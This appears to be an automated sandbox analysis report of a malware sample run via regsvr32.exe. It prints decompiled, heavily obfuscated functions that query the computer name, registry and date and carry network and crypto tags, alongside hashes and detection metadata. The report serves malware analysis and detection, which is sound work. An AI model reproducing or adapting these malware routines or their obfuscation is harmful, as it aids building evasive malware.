                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7c88
                                                                                                                                                        0x00fd7e53
                                                                                                                                                        0x00fd7e59
                                                                                                                                                        0x00fd7c8e
                                                                                                                                                        0x00fd7c93
                                                                                                                                                        0x00fd7c99
                                                                                                                                                        0x00fd7ca8
                                                                                                                                                        0x00fd7cac
                                                                                                                                                        0x00fd7cb1
                                                                                                                                                        0x00fd7cb6
                                                                                                                                                        0x00fd7cb6
                                                                                                                                                        0x00fd7c93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7c88
                                                                                                                                                        0x00fd7c39
                                                                                                                                                        0x00fd7db6
                                                                                                                                                        0x00fd7e8d
                                                                                                                                                        0x00fd7e93
                                                                                                                                                        0x00fd7e99
                                                                                                                                                        0x00fd7e9e
                                                                                                                                                        0x00fd7ea3
                                                                                                                                                        0x00fd7ea8
                                                                                                                                                        0x00fd7eb3
                                                                                                                                                        0x00fd7eb6
                                                                                                                                                        0x00fd7eb9
                                                                                                                                                        0x00fd7eca
                                                                                                                                                        0x00fd7ed0
                                                                                                                                                        0x00fd7ed6
                                                                                                                                                        0x00fd7edb
                                                                                                                                                        0x00fd7ede
                                                                                                                                                        0x00fd7eec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7eec
                                                                                                                                                        0x00fd7dc1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7f11
                                                                                                                                                        0x00fd7f11
                                                                                                                                                        0x00fd7c44
                                                                                                                                                        0x00fd7def
                                                                                                                                                        0x00fd7e03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7e03
                                                                                                                                                        0x00fd7c4f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7c51

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00FDCDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00FE0A77), ref: 00FDCE20
                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,D179479F,A4EA36C8,00000000,?), ref: 00FD7D8E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeapOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4287083251-0
                                                                                                                                                        • Opcode ID: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction ID: 03188a1c0ec840e49edfc9d98366fd90e822e3a59f867e3a17bd1d7311ee0155
                                                                                                                                                        • Opcode Fuzzy Hash: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction Fuzzy Hash: 8081257271D7C08ADB24DB19E49075EB6A2F388B54F184117EB9ECBB18EF39C8509B01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00FDD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                        			E00FDD1C4(intOrPtr __rcx, intOrPtr __rdx) {
				char _v68;
				char _v72;
				void* _v80;
				long long _v88;
				void* _v96;
				signed long long _v104;
				void* _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				char _v129;
				void* _t47;
				void* _t81;
				signed long long _t88;
				long long* _t90;
				intOrPtr* _t94;
				signed long long _t96;
				intOrPtr _t106;
				signed long long* _t108;
				intOrPtr _t110;
				long long _t111;
				long long _t112;
				long long _t113;

				_t108 =  &_v104;
				_t110 = __rdx;
				_t106 = __rcx;
				_t94 =  &_v68;
				_v96 = _t94;
				_t88 = _v96;
				 *_t94 = 0x14;
				r13d = 0;
				r8d = 0x913338ad;
				r9d = 0x74;
				E00FDFAD7(1, _t81, _t88, __rcx);
				_t98 = __rcx;
				GetComputerNameA(??, ??); // executed
				_v129 =  *((intOrPtr*)(__rcx));
				_t96 =  &_v128 | _t88;
				_t47 = 0x72f0bc31;
				_t112 =  &_v72;
				_t113 =  &_v112;
				L1:
				while(_t47 > 0x31a4f3ac) {
					if(_t47 > 0x368c7021) {
						if(_t47 == 0x368c7022) {
							_v88 = _t112;
							_v80 = _t113;
							_t90 = _v80;
							_v112 = _t111;
							r8d = 0x8ece2d00;
							r9d = 0x209;
							E00FDFAD7(0xa, _t81, _t90, _t98);
							 *_t90(); // executed
							_t88 = _v112;
							_v104 = _t88;
							_t47 =  ==  ? 0x31a4f3ad : 0x2d657e6;
						} else {
							if(_t47 == 0x72f0bc31) {
								_t47 =  ==  ? 0x900af59d : 0x368c7022;
							}
						}
						continue;
					}
					if(_t47 == 0x31a4f3ad) {
						_v128 = r13b;
						_v124 = 0x21a85fec;
						_v120 = 0x73bf45ed;
						if(_v128 != r13b) {
							L16:
							_t98 = _t110;
							r8d = 8;
							E00FDC96E(_t47, _t110, _t96);
							_t47 = 0x134a0c57;
							continue;
						}
						do {
							 *(_t108 + 0x2c + _t88 * 4) =  *(_t108 + 0x2c + _t88 * 4) & 0x8c10ef5d |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x73ef10a2;
							_t47 = 1;
						} while (_t88 == 0);
						goto L16;
					} else {
						if(_t47 == 0x31fa4db0) {
							E00FDC3D4(_v104, _t110);
							r8d = 0xd4d62162;
							r9d = 0x208;
							E00FDFAD7(0xa, _t81, _t88, _v104);
							_t98 = _v112;
							 *_t88();
							_t47 = 0x134a0c57;
						}
						continue;
					}
				}
				if(_t47 == 0x900af59d) {
					_v128 = r13b;
					_v124 = 0x73bca5c0;
					_v120 = 0x32f8abda;
					if(_v128 != r13b) {
						L20:
						_t98 = _t106;
						r8d = 7;
						E00FDC96E(_t47, _t106, _t96);
						_t47 = 0x368c7022;
						goto L1;
					}
					do {
						 *(_t108 + 0x2c + _t88 * 4) = ( *(_t108 + 0x2c + _t88 * 4) & 0x9ec2c1cc |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x613d3e33) ^ 0x53c5d4bd;
						_t47 = 1;
					} while (_t88 == 0);
					goto L20;
				}
				if(_t47 == 0x2d657e6) {
					_t88 = _v104;
					_t47 =  ==  ? 0x31a4f3ad : 0x31fa4db0;
					goto L1;
				}
				if(_t47 != 0x134a0c57) {
					goto L1;
				}
				return _t47;
			}


























                                                                                                                                                        0x00fdd1d0
                                                                                                                                                        0x00fdd1d4
                                                                                                                                                        0x00fdd1d7
                                                                                                                                                        0x00fdd1da
                                                                                                                                                        0x00fdd1df
                                                                                                                                                        0x00fdd1e4
                                                                                                                                                        0x00fdd1e9
                                                                                                                                                        0x00fdd1ef
                                                                                                                                                        0x00fdd1f9
                                                                                                                                                        0x00fdd1ff
                                                                                                                                                        0x00fdd205
                                                                                                                                                        0x00fdd20a
                                                                                                                                                        0x00fdd210
                                                                                                                                                        0x00fdd214
                                                                                                                                                        0x00fdd222
                                                                                                                                                        0x00fdd225
                                                                                                                                                        0x00fdd22f
                                                                                                                                                        0x00fdd234
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd239
                                                                                                                                                        0x00fdd245
                                                                                                                                                        0x00fdd2b6
                                                                                                                                                        0x00fdd3b4
                                                                                                                                                        0x00fdd3be
                                                                                                                                                        0x00fdd3c3
                                                                                                                                                        0x00fdd3c8
                                                                                                                                                        0x00fdd3d4
                                                                                                                                                        0x00fdd3da
                                                                                                                                                        0x00fdd3e0
                                                                                                                                                        0x00fdd3ed
                                                                                                                                                        0x00fdd3ef
                                                                                                                                                        0x00fdd3f4
                                                                                                                                                        0x00fdd403
                                                                                                                                                        0x00fdd2bc
                                                                                                                                                        0x00fdd2c1
                                                                                                                                                        0x00fdd2d6
                                                                                                                                                        0x00fdd2d6
                                                                                                                                                        0x00fdd2c1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd2b6
                                                                                                                                                        0x00fdd24c
                                                                                                                                                        0x00fdd2de
                                                                                                                                                        0x00fdd2e3
                                                                                                                                                        0x00fdd2eb
                                                                                                                                                        0x00fdd2f8
                                                                                                                                                        0x00fdd320
                                                                                                                                                        0x00fdd320
                                                                                                                                                        0x00fdd326
                                                                                                                                                        0x00fdd32c
                                                                                                                                                        0x00fdd331
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd331
                                                                                                                                                        0x00fdd2fc
                                                                                                                                                        0x00fdd312
                                                                                                                                                        0x00fdd319
                                                                                                                                                        0x00fdd319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd252
                                                                                                                                                        0x00fdd257
                                                                                                                                                        0x00fdd261
                                                                                                                                                        0x00fdd272
                                                                                                                                                        0x00fdd278
                                                                                                                                                        0x00fdd27e
                                                                                                                                                        0x00fdd283
                                                                                                                                                        0x00fdd286
                                                                                                                                                        0x00fdd288
                                                                                                                                                        0x00fdd288
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd257
                                                                                                                                                        0x00fdd24c
                                                                                                                                                        0x00fdd294
                                                                                                                                                        0x00fdd33b
                                                                                                                                                        0x00fdd340
                                                                                                                                                        0x00fdd348
                                                                                                                                                        0x00fdd355
                                                                                                                                                        0x00fdd383
                                                                                                                                                        0x00fdd383
                                                                                                                                                        0x00fdd389
                                                                                                                                                        0x00fdd38f
                                                                                                                                                        0x00fdd394
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd394
                                                                                                                                                        0x00fdd359
                                                                                                                                                        0x00fdd375
                                                                                                                                                        0x00fdd37c
                                                                                                                                                        0x00fdd37c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd359
                                                                                                                                                        0x00fdd29f
                                                                                                                                                        0x00fdd39e
                                                                                                                                                        0x00fdd3ac
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd3ac
                                                                                                                                                        0x00fdd2aa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fdd42a

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                        • Opcode ID: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction ID: 80c4bb05eb735d97e8ae93bdf94b650891777ae03c3a6ca2ae7d5db7a239de9a
                                                                                                                                                        • Opcode Fuzzy Hash: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction Fuzzy Hash: 98510C2670864486CA249B5AF85461FBB52F389794F5C411BFF8E87B58CA3DC846EB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00FDC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 15%
                                                                                                                                                        			E00FDC450(signed long long __rax, long long __rcx) {
				char _v52;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				int _t23;
				void* _t39;
				signed long long _t44;
				char* _t46;
				intOrPtr* _t47;
				long long _t48;
				void* _t49;

				_t44 = __rax;
				_t48 = __rcx;
				r8d = 0xe249a58d;
				r9d = 0xac;
				E00FDFAD7(1, _t39, __rax, __rcx);
				_t46 =  &_v72;
				 *_t44();
				_t47 =  &_v52;
				 *((char*)(_t47 - 4)) = 0;
				 *_t47 = 0x32816739;
				 *((intOrPtr*)(_t47 + 4)) = 0x32816739;
				 *((intOrPtr*)(_t47 + 8)) = 0x32b5676d;
				 *((intOrPtr*)(_t47 + 0xc)) = 0x32d5670d;
				 *((intOrPtr*)(_t47 + 0x10)) = 0x329c6724;
				 *((intOrPtr*)(_t47 + 0x14)) = 0x32f86740;
				if( *((intOrPtr*)(_t47 - 4)) == 0) {
					do {
						 *(_t49 + 0x40 + _t44 * 4) =  *(_t49 + 0x40 + _t44 * 4) & 0xcd0798bf |  !( *(_t49 + 0x40 + _t44 * 4)) & 0x32f86740;
						_t46 = _t46 + 1;
						_t44 = _t44 + 1;
					} while (_t44 != 7);
				}
				r8d = 0xc87545f4;
				r9d = 0xcc;
				E00FDFAD7(1, _t39, _t44, _t46);
				_v88 = _t48;
				_v80 = 0xc;
				_t23 = GetDateFormatW(??, ??, ??, ??, ??, ??); // executed
				return _t23;
			}














                                                                                                                                                        0x00fdc450
                                                                                                                                                        0x00fdc457
                                                                                                                                                        0x00fdc463
                                                                                                                                                        0x00fdc469
                                                                                                                                                        0x00fdc46f
                                                                                                                                                        0x00fdc474
                                                                                                                                                        0x00fdc479
                                                                                                                                                        0x00fdc47b
                                                                                                                                                        0x00fdc480
                                                                                                                                                        0x00fdc488
                                                                                                                                                        0x00fdc48a
                                                                                                                                                        0x00fdc48d
                                                                                                                                                        0x00fdc494
                                                                                                                                                        0x00fdc49b
                                                                                                                                                        0x00fdc4a2
                                                                                                                                                        0x00fdc4ac
                                                                                                                                                        0x00fdc4b5
                                                                                                                                                        0x00fdc4cb
                                                                                                                                                        0x00fdc4cf
                                                                                                                                                        0x00fdc4d2
                                                                                                                                                        0x00fdc4d5
                                                                                                                                                        0x00fdc4b5
                                                                                                                                                        0x00fdc4e2
                                                                                                                                                        0x00fdc4e8
                                                                                                                                                        0x00fdc4ee
                                                                                                                                                        0x00fdc4f3
                                                                                                                                                        0x00fdc4f8
                                                                                                                                                        0x00fdc50f
                                                                                                                                                        0x00fdc519

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2793631785-0
                                                                                                                                                        • Opcode ID: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction ID: ac4d468beab9b7d06f2dd4258469abf420448c10fab19eb1eabad0df0967f16b
                                                                                                                                                        • Opcode Fuzzy Hash: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction Fuzzy Hash: 861123B23142848BE718DF15F300A5EBA51F3A5344F08C13ADB4947B44CB38D566CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Analysis Process: regsvr32.exe PID: 400 Parent PID: 3440 regsvr32.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00B76537, Relevance: 20.3, APIs: 1, Strings: 10, Instructions: 1095networkCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E00B76537(void* __edx, unsigned long long __rcx, signed long long __rdx, long long __r9, void* __r11) {
				intOrPtr _v464;
				char _v468;
				char _v472;
				signed long long _v480;
				long long _v488;
				void* _v496;
				void* _v504;
				unsigned int* _v512;
				signed long long _v520;
				signed long long _v528;
				void* _v536;
				void* _v544;
				long long _v552;
				void* _v560;
				void* _v568;
				void* _v576;
				long long _v584;
				void* _v592;
				void* _v600;
				void* _v608;
				intOrPtr _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v632;
				long long _v640;
				void* _v648;
				void* _v656;
				void* _v664;
				signed long long _v672;
				void* _v680;
				void* _v688;
				void* _v696;
				void* _v704;
				void* _v712;
				unsigned long long _v720;
				signed long long _v728;
				signed long long _v736;
				void* _v744;
				void* _v752;
				void* _v760;
				signed int _v764;
				long long _v768;
				intOrPtr _v772;
				unsigned int _v776;
				intOrPtr _v780;
				char _v784;
				char _v788;
				signed int _v792;
				signed int _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char _v808;
				signed long long _v816;
				intOrPtr _v817;
				char _v821;
				signed int _v832;
				unsigned int* _v840;
				signed int _v844;
				signed int _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				signed long long _v860;
				intOrPtr _v864;
				unsigned int _v868;
				unsigned long long _v872;
				char _v873;
				char _v875;
				void* _v888;
				signed short _v890;
				short _v892;
				void* _v904;
				unsigned int _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				intOrPtr _v928;
				signed long long _v936;
				signed int _t368;
				signed int _t417;
				signed long long _t450;
				void* _t473;
				void* _t497;
				signed int _t503;
				signed int _t532;
				signed int _t572;
				unsigned int _t596;
				signed int _t600;
				unsigned long long _t632;
				signed long long _t640;
				short* _t644;
				signed long long _t706;
				unsigned long long _t707;
				signed long long _t721;
				void* _t723;
				void* _t726;

				_t726 = __r11;
				_t725 = __r9;
				_t721 = __rdx;
				_t707 = __rcx;
				_t723 =  &_v904;
				_v568 = __r9;
				_v906 = r8b;
				_v696 = __rcx + 0xc;
				_v576 = __rcx + 0x218;
				_v584 = __rcx + 0x10;
				_t600 =  !=  ? 0xf8d80d50 : 0xf3bb400e;
				r15d = 0x5d3f2d89;
				_t363 =  !=  ? r15d : 0xf8c794ac;
				_v612 =  !=  ? r15d : 0xf8c794ac;
				r15d =  ==  ? 0xa6dbf53a : r15d;
				_t603 =  <  ? 0x902c474f : 0x4721b862;
				_v616 =  <  ? 0x902c474f : 0x4721b862;
				_t605 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v620 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v592 = __rcx + 0x240;
				_t589 =  ==  ? 0x4591200e : 0x727b8f2a;
				_v624 =  ==  ? 0x4591200e : 0x727b8f2a;
				r13d = 0xe84fe95c;
				r13d =  <  ? 0x1cfee6ca : r13d;
				r14d = 0x87afab9e;
				r14d =  <=  ? 0x7ff9f897 : r14d;
				_v600 = __rcx + 0x238;
				_v704 = __rcx + 0x24c;
				_v608 = __rcx + 0x248;
				_v752 = __rcx + 0x254;
				_v760 = __rcx + 8;
				_v488 = __rcx + 0x259;
				_v904 = __rcx;
				_t632 = __rcx + 0x258;
				_v712 = _t632;
				_v868 = 0x7ff9f897;
				_v728 = _t632;
				_v720 = _t632;
				_t368 = 0xa26d3c93;
				while(1) {
					_t503 = _t368;
					if(_t368 <= 0x12c2784) {
					}
					L2:
					if(_t503 > 0xad7f3ccf) {
						if(_t503 > 0xd55faea1) {
							if(_t503 <= 0xeee9c934) {
								if(_t503 <= 0xe84fe95b) {
									if(_t503 == 0xd55faea2) {
										_t368 =  ==  ? 0x873106d2 : 0xa4415a4b;
									} else {
										_t368 = _t503;
										if(_t503 == 0xd97c734e) {
											_t707 = _v872;
											 *((char*)(_t723 + _t707 + 0x93)) =  *((intOrPtr*)(_v736 + _t640));
											_v800 = _v872 + 1;
											_t368 = 0x62146214;
										}
									}
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L2;
									}
								}
								if(_t503 == 0xe84fe95c) {
									_t707 = _v904;
									 *((char*)(_t707 + 0x258)) = _v906;
									 *((intOrPtr*)(_t707 + 0x250)) = 0;
									 *((intOrPtr*)(_t707 + 8)) = 0;
									 *((long long*)(_t707 + 0x248)) = 1;
									_t368 = 0xc538f3c7;
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L2;
									}
								}
								if(_t503 == 0xe87f8cad) {
									_v909 = _v868;
									_t368 =  ==  ? 0xa1550a50 : 0x83ffe87a;
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L10;
									}
									goto L2;
								}
								_t368 = _t503;
								if(_t503 == 0xeec8a184) {
									_t640 = _v568;
									_t707 = _v904;
									 *_t707 = _t640;
									L143:
									_t368 = 0xc538f3c7;
								}
								continue;
							} else {
								if(_t503 > 0xf8d80d4f) {
									if(_t503 == 0xf8d80d50) {
										_t721 = _v760;
										_t334 = _t640 + 1; // 0xc3c975e0
										 *_t721 = _t334;
										_t640 = _v696;
										_v816 = _t640;
										_t368 =  <  ? 0x6c161dc6 : 0x6e65093f;
									} else {
										if(_t503 == 0xfa2adb82) {
											_t707 = _v640;
											_t721 = _v496;
											_t368 =  ==  ? 0x9cc1af46 : 0x90031297;
										} else {
											_t368 = _t503;
											if(_t503 == 0xfdcb4e26) {
												_t368 = _v616;
											}
										}
									}
								} else {
									if(_t503 == 0xeee9c935) {
										_t596 = 4;
										r8d = 0x8955631f;
										r9d = 0x189;
										E00B7FAD7(4, _t600, _t640, _t707);
										_t721 =  &_v472;
										 *_t640(); // executed
										_t640 = _v544;
										 *_t640 = 1;
										_t368 = 0x97ba314b;
									} else {
										if(_t503 == 0xf3bb400e) {
											_t640 = _v608;
											_t368 =  ==  ? 0x82b867c6 : 0x74e12cd6;
										} else {
											_t368 = _t503;
											if(_t503 == 0xf8c794ac) {
												 *_v712 = 0;
												 *_v760 = 0;
												 *_v752 = 0;
												_t640 = _v568;
												_t368 =  ==  ? 0x75019ba8 : 0xeec8a184;
											}
										}
									}
								}
								while(1) {
									_t503 = _t368;
									if(_t368 <= 0x12c2784) {
									}
									goto L2;
								}
							}
						}
						if(_t503 <= 0xc1df8fb4) {
							if(_t503 <= 0xb4b38c1e) {
								if(_t503 == 0xad7f3cd0) {
									_t450 = E00B7C51A(_t707);
									_t721 = _t450;
									_t640 = _t721 * 0xf2b9d649 >> 0x20;
									_t596 = _t596 - ((_t450 + _t596 >> 0xb) + (_t450 + _t596 >> 0x1f)) * 0x870;
									_v728 = _t721;
									_t368 = 0x7f365e09;
								} else {
									_t368 = _t503;
									if(_t503 == 0xb1cd874d) {
										 *_v752 = 0;
										_t640 = _v552;
										 *_t640 = 0;
										_t368 = 0xa574e944;
									}
								}
							} else {
								if(_t503 == 0xb4b38c1f) {
									 *_v840 = 2;
									 *_v744 = 0;
									_t640 = _v904;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00B7FAD7(1, _t600, _t640, _t707);
									 *_t640();
									_t368 = 0xd55faea2;
								} else {
									if(_t503 == 0xb75c2336) {
										_v680 = _v704;
										_t640 = _v680;
										_t368 =  ==  ? 0x95091900 : 0x34ddbdbe;
									} else {
										_t368 = _t503;
										if(_t503 == 0xc04800cb) {
											_t368 =  ==  ? 0x1bd2d9df : 0x514370c2;
											_v908 = _v909;
										}
									}
								}
							}
							continue;
						}
						if(_t503 > 0xc4b668ea) {
							if(_t503 == 0xc4b668eb) {
								_t721 = _v904;
								 *_t721 =  *((intOrPtr*)( *((intOrPtr*)(_t721 + 0x220)) + _t707 * 8));
								_t640 = _v744;
								_t707 = _v744;
								 *_t707 =  *_t640 + 1;
								L198:
								_t368 = 0x53bce5ed;
								r12b = 1;
								continue;
							}
							if(_t503 == 0xc538f3c7) {
								_v905 = bpl;
								_t368 = _v624;
							} else {
								_t368 = _t503;
								if(_t503 == 0xc6fd976d) {
									 *_v840 = 3;
									 *_v528 = 0;
									_t640 = _v904;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00B7FAD7(1, _t600, _t640, _t707);
									 *_t640();
									_t368 = 0xa4415a4b;
								}
							}
						} else {
							if(_t503 == 0xc1df8fb5) {
								_v796 = 0;
								_t368 = 0x8c01f6ea;
							} else {
								if(_t503 == 0xc2927316) {
									E00B7CDB9(0x21c0, _t640);
									_v520 = _t640;
									_t640 = _v520;
									_v480 = _t640;
									_t368 = 0xea11413;
									_v808 = 0;
								} else {
									_t368 = _t503;
									if(_t503 == 0xc3c975df) {
										_t640 = _v816;
										_t368 =  >  ? 0xa67110d8 : 0xc538f3c7;
									}
								}
							}
						}
						continue;
					}
					if(_t503 > 0x97ba314a) {
						if(_t503 <= 0xa4415a4a) {
							if(_t503 <= 0xa1550a4f) {
								if(_t503 == 0x97ba314b) {
									L178:
									_t368 = 0x94958caf;
									continue;
								}
								_t368 = _t503;
								if(_t503 == 0x9cc1af46) {
									_v788 = _v768 + 1;
									_t368 = 0x782ba57;
								}
							} else {
								if(_t503 == 0xa1550a50) {
									_v784 = 0;
									_t368 = 0xc04800cb;
								} else {
									_t368 = r14d;
									if(_t503 != 0xa26d3c93) {
										_t368 = _t503;
										if(_t503 == 0xa32a0313) {
											 *_v760 = 0;
											_v544 = _v488;
											_t640 = _v544;
											_t368 =  ==  ? 0xeee9c935 : 0x97ba314b;
										}
									}
								}
							}
							continue;
						}
						if(_t503 > 0xa6dbf539) {
							_t368 = _t600;
							if(_t503 == 0xa6dbf53a) {
								continue;
							}
							if(_t503 == 0xaaa69421) {
								E00B7CDB9(0x26, _t640);
								_t707 =  *_v888;
								 *(_t707 + _t721 * 8) = _t640;
								_v804 = _v856 + 1;
								_t368 = 0x4a668043;
								continue;
							}
							_t368 = _t503;
							if(_t503 != 0xad742835) {
								continue;
							}
							_t598 = r15d;
							r15d = r12d;
							r13d = _t600;
							r12d = r14d;
							r14d = r13d;
							_v817 = sil;
							_t497 = E00B7C55D(_t640,  &_v821) + 0xffffffee;
							_t473 = E00B7C55D(_t640,  &_v875);
							r8d = 0xc;
							r8d = r8d - _t473;
							_v472 = sil;
							_v468 = 0x3453b36b;
							_v464 = 0x5061f96b;
							if(_v472 != sil) {
								L118:
								_t707 = _v672;
								_t721 =  &_v468;
								r9d = _t497;
								E00B8020E(_t640, _t707, _t721, _t724, _t725);
								_v648 = _v600;
								 *_v648 = 0x870;
								_v888 = _v592;
								_t640 = _v888;
								_t368 =  ==  ? 0x2ccb8bda : 0xc2927316;
								r14d = r12d;
								_t600 = r13d;
								r13d = r14d;
								r12d = r15d;
								r15d = _t598;
								continue;
							}
							do {
								_t572 =  *(_t723 + 0x1f4 + _t640 * 4);
								_t596 =  !_t572 & 0x50619d4e;
								 *(_t723 + 0x1f4 + _t640 * 4) = _t572 & 0xaf9e62b1 | _t596;
							} while (_t640 == 0);
							goto L118;
						}
						if(_t503 == 0xa4415a4b) {
							_t640 = _v840;
							_t368 =  ==  ? 0xb75c2336 : 0x280f3889;
							continue;
						}
						if(_t503 == 0xa574e944) {
							L38:
							_t368 = 0xc538f3c7;
							bpl = 1;
							continue;
						}
						_t368 = _t503;
						if(_t503 != 0xa67110d8) {
							continue;
						} else {
							 *_v752 = 0;
							_t640 = _v712;
							 *_t640 = 0;
							goto L38;
						}
					}
					if(_t503 > 0x8c01f6e9) {
						if(_t503 > 0x902c474e) {
							if(_t503 == 0x902c474f) {
								_v552 = _v712;
								_t368 =  ==  ? 0xa574e944 : 0xb1cd874d;
							} else {
								if(_t503 == 0x94958caf) {
									_v688 = _v752;
									_t640 = _v688;
									E00B764D6( *_t640, _t640);
									_t368 = 0xaa8668a;
								} else {
									_t368 = _t503;
									if(_t503 == 0x95091900) {
										E00B7CDB9(7, _t640);
										_v672 = _t640;
										E00B7CDB9(0x18, _t640);
										_v736 = _t640;
										_t706 = _v736;
										_t598 = r12d;
										r12d = 0;
										r8d = 0xc87545ea;
										r9d = 0xcb;
										E00B7FAD7(1, _t600, _t640, _t707);
										_v936 = _t706;
										_v928 = 0x18;
										r8d = 0;
										r9d = 0;
										 *_t640();
										_v664 =  &_v875;
										_t644 = _v664;
										 *(_t644 + 2) = r12b;
										 *_t644 = 0;
										_v656 =  &_v821;
										_t640 = _v656;
										_v720 = _t707;
										 *(_t640 + 4) = r12b;
										 *_t640 = 0;
										_t368 = 0x844b3ff6;
									}
								}
							}
						} else {
							if(_t503 == 0x8c01f6ea) {
								_v764 = _v796;
								_v632 = _v764;
								_t640 = _v640;
								_t707 = _v632;
								_v890 =  *(_t640 + _t707 * 2) & 0x0000ffff;
								_t368 =  ==  ? 0x5903be2d : 0x5ffd86ff;
							} else {
								if(_t503 == 0x8efa67b7) {
									_t368 = 0x782ba57;
									_v788 = 0;
								} else {
									_t368 = _t503;
									if(_t503 == 0x90031297) {
										_v868 = 0;
										_t368 = 0xe87f8cad;
									}
								}
							}
						}
					} else {
						if(_t503 <= 0x844b3ff5) {
							if(_t503 == 0x82b867c6) {
								_v560 = _v760;
								_v780 =  *_v560;
								_t368 =  <  ? 0x6f81883a : 0x74e12cd6;
							} else {
								_t368 = _t503;
								if(_t503 == 0x83ffe87a) {
									_v784 = 0x13;
									_t368 = 0xc04800cb;
								}
							}
						} else {
							if(_t503 == 0x844b3ff6) {
								_t640 = _v720;
								_v860 = _t368;
								_t368 =  <  ? 0x564692ca : 0x6ecf8e8e;
							} else {
